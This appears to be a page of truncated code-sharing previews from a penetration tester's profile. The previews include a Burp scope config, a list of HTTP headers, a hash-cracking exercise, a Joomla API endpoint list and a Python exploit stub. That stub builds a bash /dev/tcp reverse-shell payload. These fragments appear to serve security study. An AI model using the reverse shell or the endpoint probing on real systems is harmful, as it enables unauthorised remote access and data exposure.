Column number in the table
SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'table_name';| czj | |
| drm | |
| ttn | |
| fka | |
| njg | |
| wgy | |
| axc | |
| zvy | |
| cly | |
| jsj |
| { | |
| "target":{ | |
| "scope":{ | |
| "advanced_mode":true, | |
| "exclude":[ | |
| { | |
| "enabled":true, | |
| "host":".*\\.google\\.com", | |
| "protocol":"any" | |
| }, |
| 1_0_2204_21 | |
| 1_0_2914_0 | |
| 1_0_3705_0 | |
| 1_0_3705_209 | |
| 1_0_3705_288 | |
| 1_0_3705_6018 | |
| 1_1_4322_510 | |
| 1_1_4322_573 | |
| 1_1_4322_2032 | |
| 1_1_4322_2300 |
| // Source: https://danaepp.com/detecting-uncommon-headers | |
| String[] standardHeaders = { | |
| "accept-patch", | |
| "accept-ranges", | |
| "access-control-allow-credentials", | |
| "access-control-allow-headers", | |
| "access-control-allow-methods", | |
| "access-control-allow-origin", | |
| "access-control-expose-headers", |
| #!/usr/bin/python3 | |
| import os, sys, argparse, urllib.parse, socket, requests, time | |
| def revshell(lhost, lport): | |
| command = f'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' | |
| return compile_payload(command) | |
| def get_target_url(rhost, rport): |
| # Use the MD5 GPU hash rate from the GPU benchmark of this section | |
| # and calculate the cracking time in minutes with the following conditions. | |
| # Use a charset of all lower and upper case letters of the English alphabet | |
| # and use a password length of 8. Enter the answer as full minutes without seconds. | |
| charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" | |
| passw_length = 8 | |
| # hashcat -b | |
| hash_rate = 681851 * 100000 # hash rate for MD5 GPU from the benchmark |
| // 0x616a2f656d6f682f -> aj/emoh/ -> /home/ja | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <string.h> | |
| void int64_to_char(char mesg[], int64_t num) { | |
| for(int i = 0; i < 8; i++) |
| /api/index.php/v1/banners | |
| # /api/index.php/v1/banners/{banner_id} | |
| /api/index.php/v1/banners/clients | |
| # /api/index.php/v1/banners/clients/{client_id} | |
| /api/index.php/v1/banners/categories | |
| # /api/index.php/v1/banners/categories/{category_id} | |
| # /api/index.php/v1/banners/contenthistory/{banner_id} | |
| /api/index.php/v1/config/application?public=true | |
| # /api/index.php/v1/config/{component_name} | |
| /api/index.php/v1/contact |